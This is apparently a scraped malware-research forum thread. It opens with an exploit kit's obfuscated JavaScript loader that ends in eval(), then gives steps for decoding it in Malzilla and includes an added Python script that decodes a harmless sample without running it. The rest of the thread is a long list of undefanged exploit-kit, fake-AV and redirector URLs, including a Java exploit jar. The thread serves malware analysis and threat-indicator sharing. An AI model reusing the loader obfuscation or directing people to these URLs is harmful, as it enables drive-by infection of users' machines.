function hlhtkt(hnxoir5){return hnxoir5.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));};var gsyna=1002;var czkpev3='';for (ctxodqa = gsyna; ctxodqa > 0; ctxodqa--){for (hriwklc5 = gsyna-ctxodqa; hriwklc5 <= bnfzxnh.length; hriwklc5=hriwklc5+gsyna){czkpev3=czkpev3+bnfzxnh.charAt(hriwklc5);}}var asioivh=czkpev3+"EERS();}}MDAC();";var ezbmfwb=hlhtkt(asioivh);this[String.fromCharCode(0x65,118,0x61,108)](ezbmfwb);
8.) Copy this code into Malzilla's decoder window and click the "Run script" button. Click into the "Eval() results" window. The deobfuscated code now appears in the bottom window.
This code isn't well formatted and therefore not easy to read. Mark all code and copy it into the upper decoder window. Now click the "Format code" button.
Now you can browse through the code and see the payload urls for various exploits.
This decoding procedure can also be done easily by script. ;)
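A static version of the decoding steps above, as an added example that is not part of the original post or the kit's code: it ports the sample's nested loops (column-wise read with a fixed stride) and its character substitutions to Python and returns the script that would have reached eval() instead of running it. The function names, the stride of 7 and the sample input are assumptions made for the example; the posted sample uses a stride of 1002 and its own appended tail.

```python
import re

# Substitutions made by the sample's helper (hlhtkt in the post), using the
# characters as they appear on the page: ` -> space, ~ -> ", » -> LF, • -> backslash.
SUBSTITUTIONS = str.maketrans({"`": " ", "~": '"', "\u00bb": "\n", "\u2022": "\\"})
URL_RE = re.compile(r"https?://[^\s\"'<>\\)]+", re.I)

def deinterleave(blob, stride):
    """Read the blob column by column, as the sample's nested loops do."""
    return "".join(blob[col::stride] for col in range(stride))

def interleave(plain, stride):
    """Inverse of deinterleave; only used to build the constructed input."""
    out = [""] * len(plain)
    pos = 0
    for col in range(stride):
        width = len(range(col, len(plain), stride))
        out[col::stride] = plain[pos:pos + width]
        pos += width
    return "".join(out)

def decode_layer(blob, stride, tail=""):
    """Return the script the sample would pass to eval(), without running it."""
    return (deinterleave(blob, stride) + tail).translate(SUBSTITUTIONS)

def defanged_urls(script):
    """List URLs found in the decoded script, defanged for safe sharing."""
    return [u.replace("http", "hxxp", 1).replace(".", "[.]")
            for u in URL_RE.findall(script)]

# Constructed sample (not from the kit): a harmless script encoded the same way.
SAMPLE_PLAIN = "var`u=~http://payload.example/l.php?i=1~;\u00bbdocument.write(u"
SAMPLE_TAIL = ");"   # stands in for the fixed tail the real sample appends
SAMPLE_STRIDE = 7    # assumption for the example; the posted sample uses 1002
SAMPLE_BLOB = interleave(SAMPLE_PLAIN, SAMPLE_STRIDE)

if __name__ == "__main__":
    decoded = decode_layer(SAMPLE_BLOB, SAMPLE_STRIDE, SAMPLE_TAIL)
    print(decoded)
    print(defanged_urls(decoded))
```
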
-
This decoding procedure can also be done easily by script. ;)
Which script are you referring to? That would be preferable. However, I thought JsUnpack was supposed to deobfuscate it all. Also, does this work for almost all, if not all exploits, not just Phoenix? Thanks.
-
http://makeithappen2ce.info/madeit/index.php?dd64feb7318e7f06a42aec888d85154e
Exploit kit
-
http://wwwlilltlnu.co.cc/8j14renk/?5
Exploit kit
-
http://takipu4.co.cc/notfound/inkujrgzk.php?n=setup174
Exploit kit
-
http://bso3.co.cc/imgurl.php?hl=8da6357d55217c4b
Exploit kit.
-
http://varapay01.co.cc/pp/jrfqysknxrdubucnjpbm.php?ID=15798
Exploit kit.
-
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
-
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
The URLs of this kit are being generated dynamically and work only once. For the same reason I don't list a payload URL for these kits.
-
http://wwwdilifiq.co.cc/m0td5iuo/?6
Exploit kit.
Would I find the payload of this the same way I would if it were a Phoenix Exploit Kit?
The URLs of this kit are being generated dynamically and work only once. For the same reason I don't list a payload URL for these kits.
Just out of curiosity though, what is the payload URL for this particular exploit kit? Thanks.
-
http://vwi6.co.cc/catalog.php?one=d4474f74ed5e5acd
Exploit kit.
http://vwi6.co.cc/games/javaobe.jar
Java exploit.
-
http://gsgwet52ysy.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAA0NBAQFDA==
Exploit kit?
-
http://4sex.cz.cc/
Fake porn site leads to fake AV.
-
http://188.127.229.180/tds/nc.php
Redirects to fake scanner page.
-
http://vwi8.co.cc/catalog.php?one=50b3cb8ecb2d58f3
Exploit kit
-
http://vwi9.co.cc/catalog.php?one=6b2b857c90eacb53
Exploit kit
-
http://2314.in/1297575843.php
Exploit kit
-
http://moa3.co.cc/imgurlfx.php?hl=180ce3af78870604
Exploit kit
-
http://dfe3.co.cc/catalog.php?one=6f92b8edd297f113
Exploit kit
-
http://tmi8.co.cc/product.php?id=4b4083e7813c9baa
Exploit kit.
-
http://mog3.co.cc/forum.php?tp=ab16731ef1d2ccc0
Exploit kit
-
http://virtualmov.com/en/stat.htm
Exploit kit
-
If the referrer is findgala.com
http://64.15.72.46:17777/click.php?go=4WIJBLIerRsykKPTgk7P+W0/H7Maq1S+LQbM5kJ0cCmT&d=VWLObkr7rqTpqcaJgPgP+Wm7BMROj21Xow0Lb+NPf8oKh78irwQz7KKN67MwyaJHPFpzzTco21vCvCday2p6C8N59XWPEXmEJoJY21AulwTkkJYilij6g6NqoVdtTep7mwUXcVkYbqaMDpXugEXaRHoMrULPF5XgVHmky+ntrvhkdTtxsu/Xyp3bP5ktpBVL+ih6usm7ZliK6d9iM5CGjFk41kOShjFXIoLe6F==&qq=mpeg+porn
Redirects to exploit kit
http://chak1com.in/forum.php?tp=bb67d93310402f39
Exploit kit.
-
http://porntube.ipq.co/
Fake porn site redirects to exploit kit.
http://2t.cz.cc/forum.php?tp=fd82ea91ecc4d94c
Exploit kit.